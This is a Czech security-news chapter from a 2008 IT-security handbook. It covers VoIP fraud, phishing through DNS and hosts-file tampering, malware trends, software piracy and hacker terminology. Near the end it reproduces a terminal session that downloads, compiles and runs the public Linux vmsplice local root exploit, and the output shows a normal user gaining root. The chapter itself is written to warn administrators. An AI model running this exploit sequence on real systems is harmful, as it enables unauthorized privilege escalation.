2 PŘEHLED ZAJÍMAVOSTÍ V OBLASTI SECURITY ZA POSLEDNÍ OBDOBÍ

část 2, díl 2, str. 1

BEZPEČNÁ POČÍTAČOVÁ SÍŤ

díl 2, Přehled zajímavostí v oblasti security za poslední období

2/2 PŘEHLED ZAJÍMAVOSTÍ V OBLASTI SECURITY ZA POSLEDNÍ OBDOBÍ V poslední době se situace z hlediska bezpečnosti dost podstatným způsobem zhrošila. Hrozby typu virů a podobných jevů se podle světových statistik spíše snižují nebo stagnují. O tisíce procent však narůstají škody, které jsou přímo vyčíslitelné. Jsou hromadně napadány služby VoIP v Evropě, jsou napadány ústředny telekomunikačních operátorů i ústředny jejich zákazníků, zdokonalují se metody pishingu.

Hrozby v posledním období

Pod pojmem phreaking rozumíme činnost, která vede k bezplatnému využívání telefonních linek (napichování služby, hovory na účet někoho jiného nebo na účet telekomunikační firmy). Phreaking má bohatou čtyřicetiletou historii. Původní telefandové pokládali phreaking za jistou formu zábavy. Postupně však phreaking přestal být módou a phreakeři (používají ukradené telekomunikační informace pro přístup k dalším počítačům) či phrackeři (snaží se napadat programy a zneužívat databáze telefonních společkvûten 2008




ností za účelem získání telefonních služeb zdarma) se začali učit pronikat do počítačových systémů. Hackeři (white hats) se od této skupiny distancují. Skoro všechna zařízení všech výrobců implementujících SIP protokol mají problémy. Škody známé autorovi v ČR za posledního půl roku dosahují desítek milionů korun. VoIP je použitelný, ale musí být velmi dobře zabezpečen: • jednotlivá zařízení musejí být umístěna v chráněné oblasti sítě, • prioritně je třeba zabezpečit prostředky pro správu ústředen, • musejí být pravidelně a často kontrolovány záznamy o přístupu, • je vhodné implementovat Fraud detection systém pro včasné zachycení podvodných volání a nelegálního provozu, • je vhodné mít postupy pro řešení následků včetně shromáždění důkazů a oznámení událostí orgánům činným v trestním řízení. Čenářům jsou jistě známy především neutuchající útoky na elektronické bankovnictví České spořitelny. Věnujme se této problematice trochu podrobněji. Co je to pishing SCAM?

Jedná se o snahu útočníka (autora viru, hackera...) navodit u své oběti dojem, že prostřednictvím internetu (elektronické pošty nebo webu) komunikuje se svou bankou nebo platební společností, a získat tak přihlašovací údaje pro přístup k účtu oběti.

Možnosti kontaktu s obětí

U elektronické pošty jde o systém zcela prozaický. Oběti je doručen e-mail s falešnou adresou odesílatele. Obsahuje barvy a loga, která jsou typická pro konkrétní banku nebo platební společnost. Dále se zde nachází text vyzývající k vyplnění formuláře v emailu,

kvûten 2008




kde se nachází takové položky jako číslo účtu oběti a její PIN. Po vyplnění formuláře a odeslání jsou takto získaná data odeslána útočníkovi. V e-mailu může být rovněž doplňující text vyzývající ke zpracování mailu obětí s tím, že je to nutná součást posilování bezpečnosti banky apod. O rozesílání závadného e-mailu se zpravidla stará virus. Kromě komunikace prostřednictvím elektronické pošty může být oběti rovněž podvržen obsah webu. Oběť má za to, že se nachází na webové stránce banky, avšak ve skutečnosti komunikuje s webovými stránkami útočníka. Ten si dopředu zajistil, že se bude adresa webu banky u oběti překládat na IP adresu útočníka. Pokud se chce majitel účtu přihlásit ke svému účtu prostřednictvím webu, tak zadá do adresního pole webového prohlížeče adresu stránek banky. Tato adresa se však nepřeloží na IP adresu webu banky, ale útočníka. K dosažení takového stavu se nabízejí tři možnosti: 1. útok na name server banky, 2. útok na DNS server ISP, 3. úpravy v systému oběti.

Podvržený obsah webu

Nutno podotknout, že jde o útok z uvedených tří možností nejobtížnější a pokud by byl možný a zejména pak zůstal bez povšimnutí, jde o selhání základních principů bezpečnosti. Plánované změny záznamů name serverů banky by měly mít stanovenou proceduru a jejich stálý monitoring by měl mít vysokou prioritu.

Útok na name server banky

Takový útok je mnohem cílenější a jeho nebezpečí spočívá v tom, že během krátké doby obsáhne velké množství potenciálních obětí. Podstatou útoku je vytvoření nebo změna příslušného záznamu mající vztah

Útok na DNS server ISP

kvûten 2008




k adrese banky v DNS forwarderu ISP. Pokud po útoku bude kdokoliv z klientů ISP používajících tento DNS forwarder požadovat IP adresu webu banky, tak se mu vrátí IP adresa útočníka. U rozšířeného systému BIND se jedná o manuální editaci souboru [/etc/named.conf] apod. Samotné editaci bude předcházet předchozí zneužití bezpečnostní chyby nebo špatné zabezpečení serveru. Takto podvržený záznam se dle specifikace RFC 1035 nejpozději do 24 hodin automaticky opraví. Úpravy v systému oběti

Snad všechny systémy mají ve výchozím nastavení sítě konvenčně zahrnuto při spuštění procesu překladu určitého doménového jména na IP adresu vyhledávání v souboru [hosts]. Pokud se do tohoto souboru umístí záznam [doménové jméno webu banky & IP adresa útočníka], tak se s tímto údajem resolver spokojí a vrátí ho jako platný údaj. Důsledek je zřejmý. U Windows se jedná díky uživatelské přívětivosti Sdílení souborů a tiskáren v sítích Microsoft a neuváženému používání systémového účtu administrátora mnohdy navíc s prázdným heslem o útok jednoduchý. Jakmile se totiž uživatel takto přihlásí do systému a pohybuje se v internetu, tak je jeho systém a pevný disk k dispozici.

Oběť navštívila web účočníka co dál?

Zobrazí se jí webová stránka s formulářem, jež je vyvedena v barvách, které jsou pro banku typické. Na stránce se může nacházet informace o probíhající údržbě webové prezentace, takže je nyní možné prostřednictvím webu pouze přihlášení k účtu - přihlašovací formulář je o pár řádků níže. Pokud oběť formulář použije (vyplní uživatelské jméno + PIN a tyto informace odešle), tak je odešle útočníkovi. Některé banky vyžadují pro přihlášení uživatele klientský certifikát. V uvedeném formuláři se proto bude nacházet ještě prvek .

kvûten 2008




Především je potřeba si uvědomit, že žádná korektní banka, platební společnost apod. nebudou nikdy chtít po svém klientovi zaslání osobních údajů prostřednictvím elektronické pošty. Pokud by k takovému náznaku došlo, tak by měl klient danou společnost obratem kontaktovat a žádat vysvětlení.

Ochrana uživatele

Jakmile se klientovi zobrazí webová stránka obsahující přihlašovací formulář k účtu, tak se musí jednat o zabezpečený (šifrovaný) přenos dat na základě certifikátu s délkou klíče minimálně 128 bitů (zákon č. 101/2000 Sb., o ochraně osobních údajů). Dnes již každý webový prohlížeč umožňuje zobrazení tohoto certifikátu. Při jeho zobrazení je nutné věnovat pozornost zejména tomu, pro jaké jméno serveru byl vystaven a zda ho vydala důveryhodná certifikační autorita. Dále je k dispozici sériové číslo, pro jehož ověření porovnáním je možné kontaktovat banku a požadovat jeho sdělení. Poslední tzv. Fingerprint je docela problém. Neexistuje uživatel, který by si toto číslo pamatoval, a tak se může stát, že se mu to bude jevit jako „nový“ certifikát bankovního ústavu, on odklepne volbu „akceptovat certifikát“ a problém je na světě. Ochrana aplikací na virtuálních serverech má mezery - Options seen lacking in firewall virtual server protection. Podle Gartnerovy zprávy síťové firewally nechrání před průběhem komunikace mezi virtuálními servery umístěnými na témže HW. Ty spolu totiž komunikují přímo a externě umístěné firewally a IPS jejich komunikaci nemají šanci zachytit.

Situace v oblasti software

Problémy mělo i Vmware a konkrétně sdílené složky s hostitelským systémem. Jejich prostřednictvím bylo možné získat kontrolu nad hostitelským systémem. kvûten 2008




Máte připravené bezpečnostní politiky, které lze použít při vývoji aplikací? Security Policies in the Application Development Process - John Steer z Microsoftu poukazuje na častý nedostatek - zanedbání bezpečnostních aspektů ve fázi vývoje je obvykle důsledkem nezformulovaných bezpečnostních zásad a jejich uplatňování. Vývojáři obvykle nemají k dispozici závazné bezpečnostní politiky, které by ve vlastním vývoji mohli uplatňovat. Viz také článek Michaela Cobba - Enterprise security in 2008: Building trust into the application development process, který se v dané souvislosti dotýká konkrétnějších problémů. Poměrně užitečným se zde především v oblasti WWW aplikací může jevit dokumentace na URL http://www.owasp.org/, kde najdete řadu dokumentů k tomu, jak bezpečnost těchto aplikací zajistit a také jak ji testovat. Protože se jedná skutečně o důležitou oblast, nabídneme v této a následujících aktualizacích tohoto díla tuto oblast podrobněji čtenářům, a to prostřednictvím nových autorů Vladimíra Kota a Kamila Golombeka. Na otázku, proč jsou webové aplikace často zranitelné, odpovídá Robert Vamosi v poznatcích získaných z rozhovoru s Chrisem Wysopalem - When Web apps attack. Zranitelnosti (a jejich zneužití) se objevují nejen například na pornografických stánkách, ale nejčastěji to bývá na stránkách, které lze charakterizovat jako amatérské stránky, kde jsou prezentovány různé koníčky (StopBadware, Harvard University). V podstatě každý počítač obsahuje nezáplatovanou aplikaci - Nearly every Windows PC likely harbors an unpatched app, Secunia says. 95 procent počítačů obsahuje jeden či více zranitelných programů, říká Sekvûten 2008




cunia - na základě testů provedených pomocí utility Personal Software Inspector. Byla nainstalována v uplynulém týdnu na 20 000 počítačích. Charles Babcock v přehledu Open Source Code Contains Security Holes komentuje výsledky analýzy amerického ministerstva pro národní bezpečnost (Department of Homeland Security). Analýza se týkala open source a jeho vztahu k zjištěným zranitelnostem a bezpečnostním chybám. Recenzi knihy Networking with Microsoft Windows Vista napsal Adam Robertson. Autorem knihy je Paul McFedries, kniha má 552 stran a vyšla v prosinci 2007. Na stránce Networking with Microsoft Windows Vista: Your Guide to Easy and Secure Windows Vista Networking najdete její obsah, popř. si ji můžete zakoupit. Tony Bradley v článku Information protection: Using Windows Rights Management Services to secure data uvádí stručný přehled služeb WRMS Windows Rights Management Services) a řadu doporučení k jejich využití pro ochranu dat. Používáte Ad-Aware SE Personal (bezplatná verze)? Pak si přečtěte tuto informaci - Important Update For Ad-Aware SE Users. Společnost Lavasoft přestala 31. prosince aktualizovat tento SW. Lze ho však odinstalovat a nainstalovat si bezplatný Ad-Aware 2007. Analýzu stínové ekonomiky malware obsahuje článek The malware ’shadow economy‘. Ian Williams zachycuje klíčové momenty interview s Maksymem Schipkou (Message labs). Interview si lze také vyslechnout (odkaz na MP3 soubor je uvnitř článku). Ekonomika internetového podsvětí se pohybuje v roz-

Malware

kvûten 2008




sahu cca 105 miliard US dolarů a přesahuje svým objemem drogovou ekonomiku. Bude červ Nugache nebezpečnější než Storm? Ellen Messmer v Nugache worm kicking up a Storm upozorňuje, že tento dva roky starý červ byl v posledních měsících upraven (hackery z RBN - Russian Business Network), vzorem k tomu byl právě Storm a má nyní nové nebezpečné vlastnosti. Top threats and security trends for 2008, přehled obsahuje dva žebříčky: Top ten web exploits for 2007 a Top security threats expected in 2008. Viz také Žebříček virových hrozeb loňska. Kdo vyhrál?. Poznámka: Oba články uvádí jako autora přehledu AVG, jedná se samozřejmě o společnost Grisoft (u českého článku, to zůstalo jen v druhé jeho části - zástupci AVG). Objevil se nový typ útoku - malware (rootkit) pro MBR (Master Boot Record) - Excuse me sir: there’s a rootkit in your master boot record, podle popisu je to skutečně nebezpečný typ malware. Může dokonce přežít reinstalaci systému. Viz podrobnou analýzu na stránce Stealth MBR rootkit. Dále se jím také zabývá článek Return of the boot-sector virus a nověji také New rootkit hides in hard drive’s boot record. Cloaking malware holes up where Windows can’t find it, say researchers. Hackeři

kvûten 2008

Jak se bránit novým trikům počítačových útočníků Jakub Dvořák na Technetu: „Víte, jaká bezpečnostní rizika na vás a váš počítač číhají v tomto roce? Přibudou hrozby pocházející z webových aplikací, na vzestupu budou i ty dosud méně známé či se objeví zcela nové. A majitele Windows Vista čeká zkouška ohněm.“




Sally Whittle v Anatomy of a hack attack s pomocí bezpečnostních expertů vytváří podobu typického hackerského útoku na dvě velké organizace. Krok po kroku pak rozebírá, jak by v takovém případě měl postupovat šéf IT. Útok SQL injection byl příčinou hromadného hacku desetitisíců webů - Mass hack infects tens of thousands of sites. Then they serve visitors multiple exploits, including October RealPlayer attack. I když je řada z těchto webů již očištěna, přesto se příslušný škodlivý skript stále dá najít na velkém počtu webových serverů. Webová stránka Geeks.com měla certifikát pro bezpečný web, ale přesto byla hacknuta - Update: ’Hacker safe‘ Web site gets hit by hacker. Vedlo to následně ke kompromitaci citlivých dat zákazníků (jména, adresy, telefonní čísla a čísla kreditních karet Visa). Pro získání celkového přehledu osob pohybujících se v digitálním undergroundu jsou uvedeny další pojmy: samuraj - útočník, který pronikne do systému, avšak následně správci oznámí bezpečnostní nedostatky a poskytne mu konkrétní rady, script-kiddies - začínající útočníci s průměrnými znalostmi, kteří dokáží na internetu najít kód a mírně ho upravit, např. pro spuštění nové varianty viru (převážně využívají nástroje vytvořené jinými útočníky skripty), packet monkeys - nezkušení uživatelé, kteří provádějí DoS útoky či jiné útoky nevyžadující prolomení ochrany, opět za použití utilit vytvořených jinými, phreaker/phracker - útočník, který proniká a zneužívá telefonních sítí, kvûten 2008




phisher - útočník, který vytváří identické webové stránky většinou různých finančních institucí a poté ukradne a zneužije citlivé údaje uživatelů, kteří je zadají v domnění, že jde o oficiální stránky instituce, knacker - útočník, který odstraňuje ochranný kód programu za účelem jeho volného používání, looser/lamer - uživatelé neznalí prostředí IT. Softwarové pirátství je pravděpodobně nejproblematičtější oblastí neoprávněných zásahů do autorského díla. Každý uživatel počítače si shání SW dle svého zájmu, účelu a pochopitelně též finančních možností. Počítačovým programem nemáme na mysli jen různé kancelářské aplikace, rozmanité utility pro práci s grafikou, ale také hry, které jsou častou obětí softwarového pirátství u dětí a mládeže. Dalším oblíbeným artiklem, který se ocitá ve spárech pirátství, jsou hudební (nejčastěji v komprimovaném formátu MP3) a filmová díla (formát AVI, DivX apod.). S pirátstvím je neodmyslitelně spjata problematika výroby a užívání tzv. cracků (§ 43 TrZ). Tímto pojmem rozumíme program, který umožňuje plně funkční užívání časově omezeného nebo jinak chráněné aplikačního programu nebo hry. Kromě cracků je na internetu také zveřejňováno velké množství sériových čísel (např. www.serials.com, www.serials.ws, www.t1000.net aj.) k nezměrnému počtu programů, po jejichž zadání se program stává plně funkčním. Dalším typem překonávání důkladnější ochrany, a to tzv. hardwarového klíče, který je implementován u dražších programů, jako např. AutoCAD, je tzv. reverse ingeneering (zpětná dekompilace systému). Následně stačí přeskočit komunikaci s HW klíčem nebo test daného omezení. V řadě případů je to pro takové osoby výzvou a někdy stačí zadat požadavek na prolomení dané kvûten 2008




aplikace a během pár dnů dostanete výsledek. Ovšem pochopitelně nevíte, co ještě jste případně k výsledku získali. Fenomén warezu je výsledkem nástupu moderních ICT, a to především internetu. Zatímco do nástupu warezu šlo o izolované obory pirátství v oblasti SW, hudby a videa, díky rychlé přenosové kapacitě internetu a stále se zdokonalujícím kompresním formátům dat spolu se zařízením pro jejich uchovávání se dnes spojují všechny tyto tři činnosti do jedné. Princip warez scény je postaven na bázi „non-profit“. Drtivá většina lidí toto pravidlo respektuje a chová se podle něj. Jediné, co jednotlivec nebo skupina získají, je respekt konkurenčních skupin v případě kvalitních výsledků. Warez bývá doménou skupin, které se vyznačují poměrně vysokou mírou specializace a dělby práce. V každé takové skupině většinou bývá jeden či několik crackerů, kteří se zabývají obcházením ochrany proti kopírování zabudované v programech. Další se věnují propagaci, tvorbě webových stránek s upoutávkami na své „produkty“, tvorbou katalogů, které jsou rozesílány, reklamních letáků atp. Nejpopulárnější formou pro sdílení nelegálního obsahu jsou tzv. peer-to-peer sítě - P2P (opak architektury klient-server). Oblíbenost výměnných sítí spočívá v tom, že s rostoucím množstvím uživatelů celková dostupná přenosová kapacita roste, zatímco u modelu client-server, kdy se uživatelé musí dělit o konstantní kapacitu serveru, průměrná přenosová rychlost při nárůstu uživatelů klesá. Tyto programy pro sdílení souborů, jako např. Direct Connect (DC, DC++), BitTorrent, WarezP2P, eMule apod., umožkvûten 2008




ňují vyhledávání podle jména, žánru či klíčového slova týkající se hudby, filmů či SW. Odhaduje se, že na internetu se nachází téměř miliarda nelegálně nasdílených hudebních skladeb. Dnešní anonymní výměnné sítě umožňují (legální i nelegální) výměnu souborů s prakticky nulovou mírou odpovědnosti jednotlivých uživatelů. Dochází však k žalobám (zejména v USA) na provozovatele takových sítí, které podávají zástupci autorů a organizace, jako je RIAA či MPAA. Poslední známou událostí je zastavení serveru thepiratebay.org. Bezpečnost jádra Linuxu

V posledním období se objevují bezpečnostní problémy nejen v MS Windows, ale i v Linuxu. Docela zajímavý je následující exploit, který umožňuje získat v systému pro běžného uživatele práva superuživatele. ber@toad:~$ uname -a Linux toad 2.6.18-5-486 #1 Mon Dec 24 16:04:42 UTC 2007 i586 GNU/Linux ber@toad:~$ id uid=500(ber) gid=100(users) skupiny=100(users),502(vboxusers) ber@toad:~$ whoami ber ber@toad:~$ wget -nv http://www.securityfocus.com/data/vulnerabilities/explo its/27704.c 13:13:30 URL:http://downloads.securityfocus.com/vulnerabilities/ex ploits/27704.c [6264/6264] -> „27704.c“ [1] ber@toad:~$ gcc 27704.c -o 27704 ber@toad:~$ ./27704 ---------------------------------Linux vmsplice Local Root Exploit By qaaz ----------------------------------

kvûten 2008




[+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7da9000 .. 0xb7ddb000 [+] root root@toad:~# id uid=0(root) gid=0(root) skupiny=0(root),1(bin),2(daemon),3(sys),4( adm),6(disk),10(wheel) root@toad:~# whoami root root@toad:~#

Takže pokud spravujete někde Linux systémy, je třeba dávat pozor na takovéto problémy. Není dobré spojovat služby a např. na jednom systému provozovat systém pro práci uživatelů s přístupem přes SSH a např. e-mailový systém organizace. Problém v tomto případě může být ten, že se uživatel dostane k e-mailovým schránkám ostatních uživatelů. To nemusí být žádoucí a asi to není ani očekávaný stav.

kvûten 2008

část 2, díl 2, str. 14 díl 2, Přehled zajímavostí v oblasti security za poslední období

kvûten 2008


2 PŘEHLED ZAJÍMAVOSTÍ V OBLASTI SECURITY ZA POSLEDNÍ OBDOBÍ

Recommend Documents